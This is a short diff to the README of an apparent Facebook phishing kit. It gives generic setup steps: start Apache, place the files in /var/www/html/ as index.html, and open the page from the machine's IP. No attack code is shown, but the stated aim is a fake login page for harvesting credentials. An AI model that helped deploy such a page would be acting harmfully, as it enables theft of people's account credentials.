dadosneurais/facebook-phishing/README.md

 systemctl start apache2

-Save the files inside the /var/www/html/
-Alter the html name to: index.html
+Save the files inside the /var/www/html/ change the html name to: index.html

 The configuration is all done.
 Now you gotta to access your ip machine, example: 192.168.1.10 The page will be loaded on the browser.